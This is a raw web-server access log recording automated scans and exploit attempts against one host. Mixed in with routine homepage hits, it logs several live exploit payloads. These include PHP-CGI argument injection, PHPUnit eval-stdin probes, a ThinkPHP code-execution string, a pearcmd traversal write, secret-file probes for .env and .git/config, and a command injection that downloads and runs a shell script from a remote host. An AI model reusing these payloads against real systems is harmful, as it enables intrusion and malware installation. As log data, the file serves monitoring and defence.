103.124.82.219] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-" +[01/Feb/2026:03:01:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:03:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 168.76.20.229] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" "-" +[01/Feb/2026:03:03:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 168.76.20.229] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" +[01/Feb/2026:03:03:19 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:03:03:20 +0000] 404 - GET http 78.131.122.113 "/robots.txt" [Client 168.76.20.229] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" "-" +[01/Feb/2026:03:03:29 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.40.61.98] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:03:03:30 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.40.61.98] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:03:03:30 +0000] 404 - POST http 78.131.122.113 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:30 +0000] 405 - POST http 78.131.122.113 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.40.61.98] [Length 154] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:30 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:31 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:31 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:31 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:31 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:32 +0000] 404 - GET http 78.131.122.113 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:32 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:32 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:32 +0000] 404 - GET http 78.131.122.113 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:33 +0000] 404 - GET http 78.131.122.113 "/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:33 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:33 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:33 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:34 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:34 +0000] 404 - GET http 78.131.122.113 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:34 +0000] 404 - GET http 78.131.122.113 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:34 +0000] 404 - GET http 78.131.122.113 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:35 +0000] 404 - GET http 78.131.122.113 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:35 +0000] 404 - GET http 78.131.122.113 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:35 +0000] 404 - GET http 78.131.122.113 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:35 +0000] 404 - GET http 78.131.122.113 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:36 +0000] 404 - GET http 78.131.122.113 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:36 +0000] 404 - GET http 78.131.122.113 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:36 +0000] 404 - GET http 78.131.122.113 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:36 +0000] 404 - GET http 78.131.122.113 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:37 +0000] 404 - GET http 78.131.122.113 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:37 +0000] 404 - GET http 78.131.122.113 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:37 +0000] 404 - GET http 78.131.122.113 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:37 +0000] 404 - GET http 78.131.122.113 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:38 +0000] 404 - GET http 78.131.122.113 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:38 +0000] 404 - GET http 78.131.122.113 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:38 +0000] 404 - GET http 78.131.122.113 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:38 +0000] 404 - GET http 78.131.122.113 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:39 +0000] 404 - GET http 78.131.122.113 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:39 +0000] 404 - GET http 78.131.122.113 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:39 +0000] 404 - GET http 78.131.122.113 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:39 +0000] 404 - GET http 78.131.122.113 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:40 +0000] 404 - GET http 78.131.122.113 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:40 +0000] 404 - GET http 78.131.122.113 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:40 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:40 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../tmp/index1" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:03:41 +0000] 404 - GET http 78.131.122.113 "/containers/json" [Client 103.40.61.98] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:03:04:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:10:01 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:26:24 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:34:13 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:35:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:39:55 +0000] 404 - GET http 78.131.122.113 "/.env" [Client 159.203.169.243] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[01/Feb/2026:03:39:55 +0000] 404 - GET http 78.131.122.113 "/.git/config" [Client 159.203.169.243] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[01/Feb/2026:03:53:49 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:03:56:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:04:02:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:05:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 4.194.156.15] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[01/Feb/2026:04:08:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:16:50 +0000] 404 - GET http 78.131.122.113 "/cgi/conf.bin" [Client 194.50.16.253] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11" "http://78.131.122.113:80/mainFrame.htm" +[01/Feb/2026:04:20:51 +0000] 404 - GET http 78.131.122.113 "/.env" [Client 77.83.39.207] [Length 122] [Gzip 1.35] "wii libnup/1.0" "-" +[01/Feb/2026:04:24:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:25:13 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:26:54 +0000] 200 - GET http 78.131.122.113 "/" [Client 223.130.141.118] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[01/Feb/2026:04:39:15 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:39:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:46:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:04:59:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:01:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:05:13:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:15:00 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:16:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:27:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.197.197] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:05:36:04 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:38:36 +0000] 404 - GET http 78.131.122.113 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:05:39:44 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:05:40:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:45:13 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:46:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:05:58:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:06:00:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:04:13 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:04:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:04:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 206.81.29.46] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" "-" +[01/Feb/2026:06:12:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:06:16:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:43:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:44:16 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:50:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:53:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.197] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:06:53:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.197] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:06:55:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:06:55:41 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:00:58 +0000] 400 - GET http 78.131.122.113 "/" [Client 40.124.175.60] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:07:00:58 +0000] 400 - - http localhost "-" [Client 40.124.175.60] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:15:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:19:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:31:11 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:34:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:39:52 +0000] 404 - POST http 78.131.122.113 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20reboot%3B%20reboot" [Client 130.12.180.108] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" +[01/Feb/2026:07:45:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:48:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:48:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:50:21 +0000] 404 - POST http 78.131.122.113 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.22%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc" [Client 130.12.180.108] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" +[01/Feb/2026:07:52:54 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:07:53:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 167.94.138.59] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:07:53:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.59] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:53:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.59] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:53:51 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:07:53:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.124] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:54:00 +0000] 200 - GET http 78.131.122.113 "/" [Client 167.94.138.124] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:07:54:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.124] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.59] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:54:28 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.217.140.2] [Length 0] [Gzip -] "-" "-" +[01/Feb/2026:07:54:36 +0000] 404 - GET http 78.131.122.113 "/login" [Client 167.94.138.124] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:07:54:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.124] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:07:55:50 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:08:05:49 +0000] 404 - GET http 78.131.122.113 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:08:07:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 